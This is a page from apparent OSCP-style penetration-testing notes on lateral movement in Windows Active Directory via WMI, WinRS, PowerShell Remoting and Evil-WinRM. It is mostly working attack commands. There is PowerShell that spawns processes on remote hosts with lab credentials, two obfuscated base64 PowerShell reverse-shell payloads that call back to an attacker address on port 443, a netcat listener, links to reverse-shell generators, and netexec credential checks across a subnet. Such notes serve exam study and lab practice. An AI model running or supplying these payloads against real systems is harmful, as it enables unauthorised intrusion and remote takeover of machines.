Use of WMI and WinRM and Evil-WinRM

Type 1: Using Powershell code (Shell Or GUI Needed)

Conditions for Using WMI (Explanation) To use WMI, you need credentials for a user who is a member of the local Administrator group or a domain user. It's preferable if the user belongs to both groups, as this can help bypass the User Account Control (UAC) remote restriction. To execute a command, use the following format:

wmic /node:192.168.50.73 /user:jen /password:Nexus123! process call create "calc"

Since WMIC is a deprecated function, we will use a PowerShell script to create the process instead.

# let's use the Powershell script to create a process of calc .
$username = 'jen'; # Set Username
$password = 'Nexus123!'; # Set Password
$secureString = ConvertTo-SecureString $password -AsPlaintext -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $secureString;
$options = New-CimSessionOption -Protocol DCOM
$session = New-Cimsession -ComputerName 192.168.115.73 -Credential $credential -SessionOption $Options # Change IP to target machine IP

$command = 'calc';
Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine =$Command};

# Make sure you change IP address in the code.
# This code just make a new process of calc.

# We will use the above Powershell code to gain the reverse shell and also its base64 encoded.
# We can use the revershell website or Python code.
python3 mkpsrevshell.py $IP_KALI 443

https://gist.githubusercontent.com/tothi/ab288fb523a4b32b51a53e542d40fe58/raw/40ade3fb5e3665b82310c08d36597123c2e75ab4/mkpsrevshell.pygist.githubusercontent.com

Online - Reverse Shell Generatorwww.revshells.com

# After creating the shell ... Run all previous commands and change only the command variable as shown:
# Start NC before running this command: 
sudo rlwrap nc -lnvp 443 # In Kali Linux

$command = 'powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADQANQAuADIANAA5ACIALAA0ADQAMwApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=';
Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine =$Command};

# check the terminal you would have got the shell.

Type 2: using winRM (Shell Or GUI Needed)

For WinRS to work, the domain user must be part of the target host's Administrators or Remote Management Users group.

# We will use WinRM to connect to remote host and get the shell.
# -r:<TargetHost> :Specifies the remote host (IP address or hostname).
# -u:<Username> : Specifies the username for authentication on the remote host.
# -p:<Password>: Specifies the password associated with the username.
# <Command>: Specifies the command(s) to execute on the remote host.
# (Windows command)
winrs -r:<TargetHost> -u:<Username> -p:<Password> <Command>
# Example: 
# winrs -r:files04 -u:jen -p:Nexus123!  "cmd /c hostname & whoami"
# Since winrs only works for domain users, we'll execute the whole command in shell of windows or rdp session of windows.

# Adding and starting NC at 443 we can get reverse shell.
# Example:
# Enter target Machine name
winrs -r:files04 -u:jen -p:Nexus123!  'powershell -nop -w hidden -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADQANQAuADIANAAyACIALAA0ADQAMwApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA='

Type 3: Powershell Remoting feature. (Shell Or GUI Needed)

# If we have RDP access or shell access then we can use powershell remote feature to get shell to other user.
$username = 'jen';
$password = 'Nexus123!';
$secureString = ConvertTo-SecureString $password -AsPlaintext -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $secureString;
New-PSSession -ComputerName 192.168.115.73 -Credential $credential # Enter target Machine IP

# Now that we have access we can switch to reverse shell.
Enter-PSSession <id>

Type 4: Using Evil-WinRM (No shell or GUI access needed)

We can use it directly in Kali Linux.

This tool is allowed in the OSCP Exam also.

First, verify the credentials and ensure you have access to the WinRM protocol on the target machine.

netexec winrm <IP/Range_Of_IP> -u $UserName -p $Password  --continue-on-success
# netexec winrm 192.168.115.0/24 -u jen -p 'Nexus123!'  --continue-on-success

In the output, if you see '(Pwn3d!)', it indicates that you have local admin privileges for that machine and can attempt to log in using Evil-WinRM.

Now try to use the Evil-WinRM tool.

evil-winrm -i 192.168.115.73  -u jen -p 'Nexus123!'

# We can also use Hash to login.

PreviousLateral Movement in AD NextPSexec Tool

Last updated 1 year ago